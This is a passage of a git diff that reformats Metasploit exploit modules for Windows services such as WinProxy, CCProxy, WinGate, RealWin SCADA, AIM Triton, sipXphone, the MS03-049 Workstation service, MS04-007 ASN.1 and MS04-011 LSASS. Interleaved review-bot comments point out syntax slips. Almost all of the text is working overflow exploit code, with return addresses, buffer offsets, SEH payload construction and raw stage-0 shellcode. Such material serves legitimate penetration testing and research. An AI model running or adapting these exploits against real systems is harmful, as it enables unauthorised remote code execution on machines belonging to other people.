module exploits a buffer overflow in the Blue Coat Systems WinProxy service by sending a long port value for the Host header in a HTTP request. }, 'Author' => 'MC', 'License' => MSF_LICENSE, 'Version' => '$Revision$', - 'References' => - [ + 'References' => + [ ['CVE', '2005-4085'], ['OSVDB', '22238'], ['BID', '16147'], ['URL', 'http://www.bluecoat.com/support/knowledge/advisory_host_header_stack_overflow.html'], - ], 'DefaultOptions' => { @@ -53,17 +50,14 @@ class Metasploit3 < Msf::Exploit::Remote [ [ 'WinProxy <= 6.1 R1a Universal', { 'Ret' => 0x6020ba04 } ], # Asmdat.dll ], - 'Privileged' => true, - 'DisclosureDate' => 'January 5 2005', - 'DefaultTarget' => 0)) - register_options( - [ - Opt::RPORT(80) - ], self.class) + register_options( + [ + Opt::RPORT(80) + ], self.class) end 
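Review bot: The last hunk of bluecoat_winproxy_host.rb deletes `'Privileged' => true,`, `'DisclosureDate' => 'January 5 2005',` and `'DefaultTarget' => 0))` without re-adding them, so the `super(update_info(info,` call opened earlier in `initialize` is never closed and the module should no longer parse; the hunk's counts (17 old, 14 new) match three lines being dropped rather than lost in this rendering. Reinstate the three lines after the `Targets` array's closing `],` and before `register_options(`. The same slip appears in proxypro_http_get.rb's `@@ -47,22 +45,18 @@` hunk, which additionally drops the `'Targets' =>` key, leaving the target array as a bare element inside the `update_info` hash; that hunk needs the key and the same three closing lines restored. In both files `initialize` starts outside the hunk.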
@@ -72,7 +66,7 @@ class Metasploit3 < Msf::Exploit::Remote print_status("Trying target #{target.name}...") - sploit = "GET / HTTP/1.1" + "\r\n" + sploit = "GET / HTTP/1.1" + "\r\n" sploit += "Host: 127.0.0.1:" sploit += rand_text_english(31, payload_badchars) seh = generate_seh_payload(target.ret) @@ -81,7 +75,7 @@ class Metasploit3 < Msf::Exploit::Remote sock.put(sploit) sock.get_once(-1, 3) - + handler disconnect end diff --git a/modules/exploits/windows/proxy/ccproxy_telnet_ping.rb b/modules/exploits/windows/proxy/ccproxy_telnet_ping.rb index 14b72d7b1d..f3dd2cd880 100644 --- a/modules/exploits/windows/proxy/ccproxy_telnet_ping.rb +++ b/modules/exploits/windows/proxy/ccproxy_telnet_ping.rb @@ -11,7 +11,6 @@ require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking @@ -21,26 +20,26 @@ class Metasploit3 < Msf::Exploit::Remote super(update_info(info, 'Name' => 'CCProxy <= v6.2 Telnet Proxy Ping Overflow', 'Description' => %q{ - This module exploits the YoungZSoft CCProxy <= v6.2 suite - Telnet service. The stack is overwritten when sending an overly - long address to the 'ping' command. + This module exploits the YoungZSoft CCProxy <= v6.2 suite + Telnet service. The stack is overwritten when sending an overly + long address to the 'ping' command. }, 'Author' => [ 'Patrick Webster <patrick[at]aushack.com>' ], 'Arch' => [ ARCH_X86 ], 'License' => MSF_LICENSE, 'Version' => '$Revision$', 'References' => - [ - [ 'CVE', '2004-2416' ], - [ 'OSVDB', '11593' ], - [ 'BID', '11666 ' ], - [ 'URL', 'http://milw0rm.com/exploits/621' ], - ], + [ + [ 'CVE', '2004-2416' ], + [ 'OSVDB', '11593' ], + [ 'BID', '11666 ' ], + [ 'URL', 'http://milw0rm.com/exploits/621' ], + ], 'Privileged' => false, 'DefaultOptions' => - { - 'EXITFUNC' => 'thread', - }, + { + 'EXITFUNC' => 'thread', + }, 'Payload' => { 'Space' => 1012, 
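Review bot: The re-indented reference `[ 'BID', '11666 ' ],` in ccproxy_telnet_ping.rb keeps a trailing space inside the identifier string, which the commit rewrites but does not fix. Change it to `[ 'BID', '11666' ],` so the ID matches the other entries and anything built from it (a reference URL, for instance) is not left with a stray space. The rest of the hunk is indentation only.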
@@ -48,17 +47,17 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Platform' => ['win'], 'Targets' => - [ - # Patrick - Tested OK 2007/08/19. W2K SP0, W2KSP4, XP SP0, XP SP2 EN. - [ 'Windows 2000 Pro All - English', { 'Ret' => 0x75023411 } ], # call esi ws2help.dll - [ 'Windows 2000 Pro All - Italian', { 'Ret' => 0x74fd2b81 } ], # call esi ws2help.dll - [ 'Windows 2000 Pro All - French', { 'Ret' => 0x74fa2b22 } ], # call esi ws2help.dll - [ 'Windows XP SP0/1 - English', { 'Ret' => 0x71aa1a97 } ], # call esi ws2help.dll - [ 'Windows XP SP2 - English', { 'Ret' => 0x71aa1b22 } ], # call esi ws2help.dll - ], + [ + # Patrick - Tested OK 2007/08/19. W2K SP0, W2KSP4, XP SP0, XP SP2 EN. + [ 'Windows 2000 Pro All - English', { 'Ret' => 0x75023411 } ], # call esi ws2help.dll + [ 'Windows 2000 Pro All - Italian', { 'Ret' => 0x74fd2b81 } ], # call esi ws2help.dll + [ 'Windows 2000 Pro All - French', { 'Ret' => 0x74fa2b22 } ], # call esi ws2help.dll + [ 'Windows XP SP0/1 - English', { 'Ret' => 0x71aa1a97 } ], # call esi ws2help.dll + [ 'Windows XP SP2 - English', { 'Ret' => 0x71aa1b22 } ], # call esi ws2help.dll + ], 'DisclosureDate' => 'Nov 11 2004')) - register_options( + register_options( [ Opt::RPORT(23), ], self.class) @@ -86,4 +85,3 @@ class Metasploit3 < Msf::Exploit::Remote end end - diff --git a/modules/exploits/windows/proxy/proxypro_http_get.rb b/modules/exploits/windows/proxy/proxypro_http_get.rb index 0ced5800cf..cc7229d9ad 100644 --- a/modules/exploits/windows/proxy/proxypro_http_get.rb +++ b/modules/exploits/windows/proxy/proxypro_http_get.rb 
@@ -3,16 +3,14 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking @@ -30,9 +28,9 @@ class Metasploit3 < Msf::Exploit::Remote 'Author' => 'MC', 'License' => MSF_LICENSE, 'Version' => '$Revision$', - 'References' => - [ - ['CVE', '2004-0326'], + 'References' => + [ + ['CVE', '2004-0326'], ['OSVDB', '4027'], ['BID', '9716'], ], @@ -47,22 +45,18 @@ class Metasploit3 < Msf::Exploit::Remote 'StackAdjustment' => -3500, }, 'Platform' => 'win', - 'Targets' => [ [ 'Proxy-Pro GateKeeper 4.7', { 'Ret' => 0x03b1e121 } ], # GKService.exe ], - 'Privileged' => true, - 'DisclosureDate' => 'Feb 23 2004', - 'DefaultTarget' => 0)) - register_options( - [ - Opt::RPORT(3128) - ], self.class) + register_options( + [ + Opt::RPORT(3128) + ], self.class) end def exploit @@ -70,13 +64,13 @@ class Metasploit3 < Msf::Exploit::Remote print_status("Trying target #{target.name}...") - sploit = "GET /" + rand_text_english(3603, payload_badchars) - sploit += payload.encoded + [target.ret].pack('V') + make_nops(10) - sploit += "\xe9" + [-497].pack('V') + " HTTP/1.0" + "\r\n\r\n" + sploit = "GET /" + rand_text_english(3603, payload_badchars) + sploit += payload.encoded + [target.ret].pack('V') + make_nops(10) + sploit += "\xe9" + [-497].pack('V') + " HTTP/1.0" + "\r\n\r\n" sock.put(sploit) sock.get_once(-1, 3) - + handler disconnect end diff --git a/modules/exploits/windows/proxy/qbik_wingate_wwwproxy.rb b/modules/exploits/windows/proxy/qbik_wingate_wwwproxy.rb index ff94ec027f..3ce78790f8 100644 --- a/modules/exploits/windows/proxy/qbik_wingate_wwwproxy.rb +++ b/modules/exploits/windows/proxy/qbik_wingate_wwwproxy.rb 
@@ -3,16 +3,14 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking @@ -23,15 +21,15 @@ class Metasploit3 < Msf::Exploit::Remote 'Name' => 'Qbik WinGate WWW Proxy Server URL Processing Overflow', 'Description' => %q{ This module exploits a stack overflow in Qbik WinGate version - 6.1.1.1077 and earlier. By sending malformed HTTP POST URL to the - HTTP proxy service on port 80, a remote attacker could overflow - a buffer and execute arbitrary code. + 6.1.1.1077 and earlier. By sending malformed HTTP POST URL to the + HTTP proxy service on port 80, a remote attacker could overflow + a buffer and execute arbitrary code. }, 'Author' => 'patrick', 'License' => MSF_LICENSE, 'Version' => '$Revision$', - 'References' => - [ + 'References' => + [ [ 'CVE', '2006-2926' ], [ 'OSVDB', '26214' ], [ 'BID', '18312' ], @@ -56,10 +54,10 @@ class Metasploit3 < Msf::Exploit::Remote 'DisclosureDate' => 'Jun 07 2006', 'DefaultTarget' => 0)) - register_options( - [ - Opt::RPORT(80) - ], self.class) + register_options( + [ + Opt::RPORT(80) + ], self.class) end def check diff --git a/modules/exploits/windows/scada/realwin.rb b/modules/exploits/windows/scada/realwin.rb index a28e23f6ee..c05804c920 100644 --- a/modules/exploits/windows/scada/realwin.rb +++ b/modules/exploits/windows/scada/realwin.rb 
@@ -1,14 +1,16 @@ ## -# This file is part of the Metasploit Framework and may be subject to +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking @@ -19,15 +21,15 @@ class Metasploit3 < Msf::Exploit::Remote 'Name' => 'DATAC RealWin SCADA Server Buffer Overflow', 'Description' => %q{ This module exploits a stack overflow in DATAC Control - International RealWin SCADA Server 2.0 (Build 6.0.10.37). - By sending a specially crafted FC_INFOTAG/SET_CONTROL packet, - an attacker may be able to execute arbitrary code. + International RealWin SCADA Server 2.0 (Build 6.0.10.37). + By sending a specially crafted FC_INFOTAG/SET_CONTROL packet, + an attacker may be able to execute arbitrary code. }, 'Author' => [ 'MC' ], - 'License' => MSF_LICENSE, + 'License' => MSF_LICENSE, 'Version' => '$Revision$', - 'References' => - [ + 'References' => + [ [ 'CVE', '2008-4322' ], [ 'OSVDB', '48606' ], [ 'BID', '31418' ], @@ -51,26 +53,25 @@ class Metasploit3 < Msf::Exploit::Remote 'DefaultTarget' => 0, 'DisclosureDate' => 'Sep 26 2008')) - register_options([Opt::RPORT(910)], self.class) - + register_options([Opt::RPORT(910)], self.class) end def exploit connect - + data = [0x67542310].pack('V') data << [0x00000800].pack('V') data << [0x000a77e3].pack('V') data << [0x00040005].pack('V') - data << "\x00\x00" - data << make_nops(target['Offset']) + data << "\x00\x00" + data << make_nops(target['Offset']) data << [target.ret].pack('V') data << [0x00404040].pack('V') - data << payload.encoded + data << payload.encoded data << make_nops(1024) - - print_status("Trying target #{target.name}...") - sock.get_once + + print_status("Trying target #{target.name}...") + sock.get_once sock.put(data) handler 
diff --git a/modules/exploits/windows/sip/aim_triton_cseq.rb b/modules/exploits/windows/sip/aim_triton_cseq.rb index 8c332ede6a..91568b00f6 100644 --- a/modules/exploits/windows/sip/aim_triton_cseq.rb +++ b/modules/exploits/windows/sip/aim_triton_cseq.rb @@ -3,16 +3,14 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking @@ -23,16 +21,16 @@ class Metasploit3 < Msf::Exploit::Remote super(update_info(info, 'Name' => 'AIM Triton 1.0.4 CSeq Buffer Overflow', 'Description' => %q{ - This module exploits a buffer overflow in AOL's AIM - Triton 1.0.4. By sending an overly long CSeq value, - a remote attacker could overflow a buffer and execute - arbitrary code on the system with the privileges of - the affected application. + This module exploits a buffer overflow in AOL\'s AIM + Triton 1.0.4. By sending an overly long CSeq value, + a remote attacker could overflow a buffer and execute + arbitrary code on the system with the privileges of + the affected application. }, 'Author' => 'MC', 'Version' => '$Revision$', - 'References' => - [ + 'References' => + [ ['CVE', '2006-3524'], ['OSVDB', '27122' ], ['BID', '18906'], 
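Review bot: The new description line `This module exploits a buffer overflow in AOL\'s AIM` introduces a stray backslash into the module text, because inside a `%q{...}` literal a backslash is only an escape before the delimiter or another backslash, so `\'` is kept verbatim. The original `AOL's` was already valid in `%q{}`, and the sibling descriptions in sipxezphone_cseq.rb and sipxphone_cseq.rb keep `SIPfoundry's` unescaped on the new side, so this file should match them: `This module exploits a buffer overflow in AOL's AIM`.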
@@ -50,24 +48,23 @@ class Metasploit3 < Msf::Exploit::Remote 'Platform' => 'win', 'Targets' => [ - [ 'AIM Triton 1.0.4 Universal', { 'Ret' => 0x4017b3d9 } ], # coolcore45.dll + [ 'AIM Triton 1.0.4 Universal', { 'Ret' => 0x4017b3d9 } ], # coolcore45.dll ], 'Privileged' => false, 'DisclosureDate' => 'July 10 2006', 'DefaultTarget' => 0)) - register_options( - [ - Opt::RPORT(5061) - ], self) - + register_options( + [ + Opt::RPORT(5061) + ], self.class) end def exploit connect_udp user = rand_text_english(2, payload_badchars) - port = rand(65535).to_s + port = rand(65535).to_s filler = rand_text_english(792, payload_badchars) seh = generate_seh_payload(target.ret) filler[780, seh.length] = seh @@ -82,12 +79,12 @@ class Metasploit3 < Msf::Exploit::Remote sploit << "Contact: <sip:127.0.0.1:#{port}>" + "\r\n\r\n" print_status("Trying target #{target.name}...") - + udp_sock.put(sploit) handler disconnect_udp - + end end diff --git a/modules/exploits/windows/sip/sipxezphone_cseq.rb b/modules/exploits/windows/sip/sipxezphone_cseq.rb index 64d45a653b..2457b14cc6 100644 --- a/modules/exploits/windows/sip/sipxezphone_cseq.rb +++ b/modules/exploits/windows/sip/sipxezphone_cseq.rb @@ -3,16 +3,14 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking 
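Review bot: The `], self.class)` line in this hunk changes the owner passed to `register_options` from `self` to `self.class`, which is a behavioural fix rather than part of the whitespace cleanup the rest of the commit consists of, and it is easy to miss in a diff that is otherwise indentation-only. It deserves either its own commit or an explicit mention in the commit message so the change is auditable later. The identical `self` to `self.class` change appears in the `@@ -50,24 +48,23 @@` hunk of sipxphone_cseq.rb; every other module touched by this commit already passes `self.class`, so the fix brings the two SIP modules in line with them.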
@@ -23,16 +21,16 @@ class Metasploit3 < Msf::Exploit::Remote super(update_info(info, 'Name' => 'SIPfoundry sipXezPhone 0.35a CSeq Field Overflow', 'Description' => %q{ - This module exploits a buffer overflow in SIPfoundry's + This module exploits a buffer overflow in SIPfoundry's sipXezPhone version 0.35a. By sending an long CSeq header, - a remote attacker could overflow a buffer and execute - arbitrary code on the system with the privileges of - the affected application. + a remote attacker could overflow a buffer and execute + arbitrary code on the system with the privileges of + the affected application. }, 'Author' => 'MC', 'Version' => '$Revision$', - 'References' => - [ + 'References' => + [ ['CVE', '2006-3524'], ['OSVDB', '27122'], ['BID', '18906'], @@ -48,10 +46,10 @@ class Metasploit3 < Msf::Exploit::Remote 'StackAdjustment' => -3500, }, 'Platform' => 'win', - + 'Targets' => [ - ['sipXezPhone 0.35a Universal', { 'Ret' => 0x1008e853 } ], + ['sipXezPhone 0.35a Universal', { 'Ret' => 0x1008e853 } ], ], 'Privileged' => false, diff --git a/modules/exploits/windows/sip/sipxphone_cseq.rb b/modules/exploits/windows/sip/sipxphone_cseq.rb index cf9ad7e303..f11d58e606 100644 --- a/modules/exploits/windows/sip/sipxphone_cseq.rb +++ b/modules/exploits/windows/sip/sipxphone_cseq.rb @@ -3,16 +3,14 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking 
@@ -23,19 +21,19 @@ class Metasploit3 < Msf::Exploit::Remote super(update_info(info, 'Name' => 'SIPfoundry sipXphone 2.6.0.27 CSeq Buffer Overflow', 'Description' => %q{ - This module exploits a buffer overflow in SIPfoundry's - sipXphone 2.6.0.27. By sending an overly long CSeq value, - a remote attacker could overflow a buffer and execute - arbitrary code on the system with the privileges of - the affected application. + This module exploits a buffer overflow in SIPfoundry's + sipXphone 2.6.0.27. By sending an overly long CSeq value, + a remote attacker could overflow a buffer and execute + arbitrary code on the system with the privileges of + the affected application. }, 'Author' => 'MC', 'Version' => '$Revision$', - 'References' => - [ - ['CVE', '2006-3524'], - ['OSVDB', '27122'], - ['BID', '18906'], + 'References' => + [ + [ 'CVE', '2006-3524' ], + [ 'OSVDB', '27122' ], + [ 'BID', '18906' ], ], 'DefaultOptions' => { @@ -50,24 +48,23 @@ class Metasploit3 < Msf::Exploit::Remote 'Platform' => 'win', 'Targets' => [ - [ 'SIPfoundry sipXphone 2.6.0.27 Universal', { 'Ret' => 0x08016aac } ], + [ 'SIPfoundry sipXphone 2.6.0.27 Universal', { 'Ret' => 0x08016aac } ], ], 'Privileged' => false, 'DisclosureDate' => 'July 10 2006', 'DefaultTarget' => 0)) - register_options( - [ - Opt::RPORT(5060) - ], self) - + register_options( + [ + Opt::RPORT(5060) + ], self.class) end def exploit connect_udp user = rand_text_english(2, payload_badchars) - port = rand(65535).to_s + port = rand(65535).to_s filler = rand_text_english(212, payload_badchars) seh = generate_seh_payload(target.ret) filler[204, seh.length] = seh @@ -82,12 +79,12 @@ class Metasploit3 < Msf::Exploit::Remote sploit << "Contact: <sip:127.0.0.1:#{port}>" + "\r\n\r\n" print_status("Trying target #{target.name}...") - + udp_sock.put(sploit) handler disconnect_udp - + end end diff --git a/modules/exploits/windows/smb/ms03_049_netapi.rb b/modules/exploits/windows/smb/ms03_049_netapi.rb index 5b584ca598..a016543fda 100644 
--- a/modules/exploits/windows/smb/ms03_049_netapi.rb +++ b/modules/exploits/windows/smb/ms03_049_netapi.rb @@ -3,34 +3,28 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::DCERPC include Msf::Exploit::Remote::SMB - def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Microsoft Workstation Service NetAddAlternateComputerName Overflow', 'Description' => %q{ - This module exploits a stack overflow in the NetApi32 NetAddAlternateComputerName + This module exploits a stack overflow in the NetApi32 NetAddAlternateComputerName function using the Workstation service in Windows XP. }, - 'Author' => - [ - 'hdm' - ], + 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, 'Version' => '$Revision$', 'References' => 
@@ -46,55 +40,53 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Privileged' => true, 'Payload' => - { + { 'Space' => 1000, 'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c" + [*(0x80..0x9f)].pack('C*'), 'StackAdjustment' => -3500, }, 'Platform' => 'win', 'DefaultTarget' => 0, - 'Targets' => + 'Targets' => [ - [ 'Windows XP SP0/SP1', + [ 'Windows XP SP0/SP1', { 'Ret' => 0x71aa32ad # pop/pop/ret in ws2help.dll - } + } ], ], - 'DisclosureDate' => 'Nov 11 2003')) register_options( [ OptString.new('SMBPIPE', [ true, "The pipe name to use (BROWSER, WKSSVC)", 'BROWSER']), ], self.class) - end - def exploit + def exploit connect() smb_login() handle = dcerpc_handle( - '6bffd098-a112-3610-9833-46c3f87e345a', '1.0', + '6bffd098-a112-3610-9833-46c3f87e345a', '1.0', 'ncacn_np', ["\\#{datastore['SMBPIPE']}"] ) - + print_status("Binding to #{handle} ...") dcerpc_bind(handle) print_status("Bound to #{handle} ...") - print_status("Building the stub data...") - - + print_status("Building the stub data...") + + name = rand_text_alphanumeric(5000) name[3496, 4] = [target.ret].pack('V') name[3492, 2] = "\xeb\x06" name[3500, 5] = "\xe9" + [-3505].pack('V') name[0, payload.encoded.length] = payload.encoded - stub = + stub = NDR.long(rand(0xffffffff)) + NDR.UnicodeConformantVaryingString("\\\\#{datastore['RHOST']}") + NDR.long(rand(0xffffffff)) + @@ -103,9 +95,9 @@ class Metasploit3 < Msf::Exploit::Remote NDR.UnicodeConformantVaryingString('') + NDR.long(0) + NDR.long(0) - + print_status("Calling the vulnerable function...") - + begin dcerpc.call(0x1b, stub) rescue Rex::Proto::DCERPC::Exceptions::NoResponse diff --git a/modules/exploits/windows/smb/ms04_007_killbill.rb b/modules/exploits/windows/smb/ms04_007_killbill.rb index d5e1990295..b982ad83ff 100644 --- a/modules/exploits/windows/smb/ms04_007_killbill.rb +++ b/modules/exploits/windows/smb/ms04_007_killbill.rb 
@@ -3,26 +3,24 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = LowRanking include Msf::Exploit::Remote::SMB def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Microsoft ASN.1 Library Bitstring Heap Overflow', 'Description' => %q{ - This is an exploit for a previously undisclosed + This is an exploit for a previously undisclosed vulnerability in the bit string decoding code in the Microsoft ASN.1 library. This vulnerability is not related to the bit string vulnerability described in eEye advisory @@ -37,11 +35,11 @@ class Metasploit3 < Msf::Exploit::Remote all attempts to login through SMB or at the console. A reboot is required to restore proper functioning of an exploited system. - + This exploit has been successfully tested with the win32/*/reverse_tcp payloads, however a few problems were encounted when using the equivalent bind payloads. Your mileage may vary. - + }, 'Author' => [ 'Solar Eclipse <solareclipse@phreedom.org>' ], 'License' => GPL_LICENSE, @@ -58,7 +56,7 @@ class Metasploit3 < Msf::Exploit::Remote 'DefaultOptions' => { 'EXITFUNC' => 'thread' - }, + }, 'Privileged' => true, 'Payload' => { @@ -66,9 +64,9 @@ class Metasploit3 < Msf::Exploit::Remote 'StackAdjustment' => -3500, }, 'Platform' => 'win', - 'Targets' => + 'Targets' => [ - [ + [ 'Windows 2000 SP2-SP4 + Windows XP SP0-SP1', # Tested OK - 11/25/2005 hdm (bind failed) { 'Platform' => 'win', 
@@ -77,11 +75,11 @@ class Metasploit3 < Msf::Exploit::Remote ], 'DisclosureDate' => 'Feb 10 2004', 'DefaultTarget' => 0)) - + register_options( [ OptString.new('PROTO', [ true, "Which protocol to use: http or smb", 'smb']), - ], self.class) + ], self.class) end # This exploit is too destructive to use during automated exploitation. @@ -96,9 +94,9 @@ class Metasploit3 < Msf::Exploit::Remote # a non-GPL application. -hdm[at]metasploit.com def exploit - + # The first stage shellcode fixes the PEB pointer and cleans the heap - stage0 = + stage0 = "\x53\x56\x57\x66\x81\xec\x80\x00\x89\xe6\xe8\xed\x00\x00\x00\xff"+ "\x36\x68\x09\x12\xd6\x63\xe8\xf7\x00\x00\x00\x89\x46\x08\xe8\xa2"+ "\x00\x00\x00\xff\x76\x04\x68\x6b\xd0\x2b\xca\xe8\xe2\x00\x00\x00"+ @@ -124,7 +122,7 @@ class Metasploit3 < Msf::Exploit::Remote "\x08\x00\xeb\xfe" token = spnego_token(stage0, payload.encoded) - + case datastore['PROTO'] when 'smb' exploit_smb(token) @@ -134,11 +132,11 @@ class Metasploit3 < Msf::Exploit::Remote print_status("Invalid application protocol specified, use smb or http") end end - - + + def exploit_smb(token) connect - + client = Rex::Proto::SMB::Client.new(sock) begin @@ -152,33 +150,33 @@ class Metasploit3 < Msf::Exploit::Remote print_status("Error: #{e}") end end - + handler disconnect end - + def exploit_http(token) connect - + req = "GET / HTTP/1.0\r\n" req << "Host: #{ datastore['RHOST']}\r\n" req << "Authorization: Negotiate #{Rex::Text.encode_base64(token, '')}\r\n\r\n" sock.put(req) res = sock.get_once - + if (res and res =~ /0x80090301/) print_status("This server does not support the Negotiate protocol or has already been exploited") end - + if (res and res =~ /0x80090304/) print_status("This server responded with error code 0x80090304 (wth?)") - end - + end + handler disconnect end - + # Returns an ASN.1 encoded string def enc_asn1(str) 
@@ -197,25 +195,25 @@ class Metasploit3 < Msf::Exploit::Remote # Returns a BER encoded SPNEGO token def spnego_token(stage0, stage1) - + if !(stage0 and stage1) print_status("Invalid parameters passed to spnego_token") return end - + if (stage0.length > 1032) print_status("The stage 0 shellcode is longer than 1032 bytes") return end - + tag = "\x90\x42\x90\x42\x90\x42\x90\x42" - + if ((tag.length + stage1.length) > 1033) print_status("The stage 1 shellcode is too long") return end - - + + # The first two overwrites must succeed, so we write to an unused location # in the PEB block. We don't care about the values, because after this the # doubly linked list of free blocks is corrupted and we get to the second @@ -223,13 +221,13 @@ class Metasploit3 < Msf::Exploit::Remote fw = "\xf8\x0f\x01\x00" # 0x00010ff8 bk = "\xf8\x0f\x01" - + # The second overwrite writes the address of our shellcode into the # FastPebLockRoutine pointer in the PEB peblock = "\x20\xf0\xfd\x7f" # FastPebLockRoutine in PEB - - bitstring = enc_constr( + + bitstring = enc_constr( enc_bits("A" * 1024), "\x03\x00", enc_constr( @@ -244,7 +242,7 @@ class Metasploit3 < Msf::Exploit::Remote ) ) ) - + token = "\x60" + enc_asn1( # Application Constructed Object "\x06\x06\x2b\x06\x01\x05\x05\x02" + # SPNEGO OID "\xa0" + enc_asn1( # NegTokenInit (0xa0) @@ -255,8 +253,8 @@ class Metasploit3 < Msf::Exploit::Remote ) ) ) - - return token + + return token end end diff --git a/modules/exploits/windows/smb/ms04_011_lsass.rb b/modules/exploits/windows/smb/ms04_011_lsass.rb index 690c48475a..4d641bd946 100644 --- a/modules/exploits/windows/smb/ms04_011_lsass.rb +++ b/modules/exploits/windows/smb/ms04_011_lsass.rb 
@@ -3,32 +3,28 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking # # This module exploits a vulnerability in the LSASS service # - include Msf::Exploit::Remote::DCERPC include Msf::Exploit::Remote::SMB - - + def initialize(info = {}) super(update_info(info, 'Name' => 'Microsoft LSASS Service DsRolerUpgradeDownlevelServer Overflow', 'Description' => %q{ - This module exploits a stack overflow in the LSASS service, this vulnerability + This module exploits a stack overflow in the LSASS service, this vulnerability was originally found by eEye. When re-exploiting a Windows XP system, you will need need to run this module twice. DCERPC request fragmentation can be performed by setting 'FragSize' parameter. @@ -55,33 +51,33 @@ class Metasploit3 < Msf::Exploit::Remote 'StackAdjustment' => -3500, }, 'Platform' => 'win', - 'Targets' => + 'Targets' => [ # Automatic - [ + [ 'Automatic Targetting', { 'Rets' => [ ], }, ], # Windows 2000 - [ + [ 'Windows 2000 English', { 'Rets' => [ 0x773242e0 ], }, ], # Windows XP - [ + [ 'Windows XP English', { 'Rets' => [ 0x7449bf1a ], }, - ], + ], ], 'DefaultTarget' => 0)) end - + def exploit connect() @@ -93,7 +89,7 @@ class Metasploit3 < Msf::Exploit::Remote print_status("Bound to #{handle}...") print_status('Getting OS information...') - + # Check the remote OS name and version os = smb_peer_os buff = '' 
@@ -103,7 +99,7 @@ class Metasploit3 < Msf::Exploit::Remote # and give us a nice set of registers which point back to # the un-unicoded data. We simply return to a nop sled that # jumps over the return address, some trash, and into the - # final payload. Easy as pie. + # final payload. Easy as pie. when /Windows 5\.0/ str = rand_text_alphanumeric(3500) str[2020, 4] = [targets[1]['Rets'][0]].pack('V') @@ -115,7 +111,7 @@ class Metasploit3 < Msf::Exploit::Remote # eight byte segment at the end of our buffer in memory, # we make these bytes jump back to the beginning of the # buffer, giving us about 1936 bytes of space for a - # payload. + # payload. when /Windows 5\.1/ str = rand_text_alphanumeric(7000) + "\x00\x00" str[0, payload.encoded.length ] = payload.encoded @@ -130,24 +126,24 @@ class Metasploit3 < Msf::Exploit::Remote return end - stub = buff + - NDR.long(rand(0xFFFFFF)) + + stub = buff + + NDR.long(rand(0xFFFFFF)) + NDR.UnicodeConformantVaryingString('') + NDR.UnicodeConformantVaryingString('') + NDR.UnicodeConformantVaryingString('') + NDR.UnicodeConformantVaryingString('') + - NDR.long(rand(0xFFFFFF)) + + NDR.long(rand(0xFFFFFF)) + NDR.UnicodeConformantVaryingString('') + - NDR.long(rand(0xFFFFFF)) + + NDR.long(rand(0xFFFFFF)) + NDR.UnicodeConformantVaryingString('') + - NDR.long(rand(0xFFFFFF)) + + NDR.long(rand(0xFFFFFF)) + NDR.UnicodeConformantVaryingString('') + - rand_text(528) + - rand_text(528) + + rand_text(528) + + rand_text(528) + NDR.long(rand(0xFFFFFF)) print_status("Trying to exploit #{os}") - + begin response = dcerpc_call(9, stub) rescue Rex::Proto::DCERPC::Exceptions::NoResponse diff --git a/modules/exploits/windows/smb/ms04_031_netdde.rb b/modules/exploits/windows/smb/ms04_031_netdde.rb index 1d93f3e9ec..8abcceeaad 100644 --- a/modules/exploits/windows/smb/ms04_031_netdde.rb +++ b/modules/exploits/windows/smb/ms04_031_netdde.rb 
